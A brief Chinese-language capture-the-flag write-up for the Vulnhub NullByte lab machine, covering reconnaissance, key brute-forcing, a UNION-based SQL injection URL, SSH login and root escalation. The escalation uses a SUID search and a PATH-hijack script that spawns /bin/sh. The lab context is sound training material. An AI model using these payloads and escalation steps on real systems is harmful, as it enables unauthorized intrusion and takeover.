【Vulnhub】NullByte

nmap 扫描端口

访问首页有个 gif 图片，下载下来用 exiftool 看一下会发现有个 comment

访问一下 kzMb5nVYJw，要输 key，尝试用 burp 选了个 password 的字典爆破一下：elite

访问之后发现：

输入 " 报错

然后...

一年没有手工注入了，还有点怀念

http://192.168.149.195/kzMb5nVYJw/420search.php?usrtosearch="union select 1,2,3%23

你以为我接下来要手注？不，我已经忘了那些单词咋拼了Orz...

先 base64 解码一遍，然后 md5 解出来是 omega

扫目录发现

去访问一下 phpmyadmin，试了几个密码登不上

然后对着 777 端口去连接 ssh，连上了

find 找一下带有 S 权限的

find / -user root -perm -4000 -print 2>/dev/null

把那个 /var/www/backup/procwatch 给拷贝下来

echo '/bin/sh' > ps

chmod +x ps

PATH=/var/www/backup

./procwatch

然后就拿到了 root 权限，但是因为环境变量改了，所以没法直接用 ls，可以 /bin/ls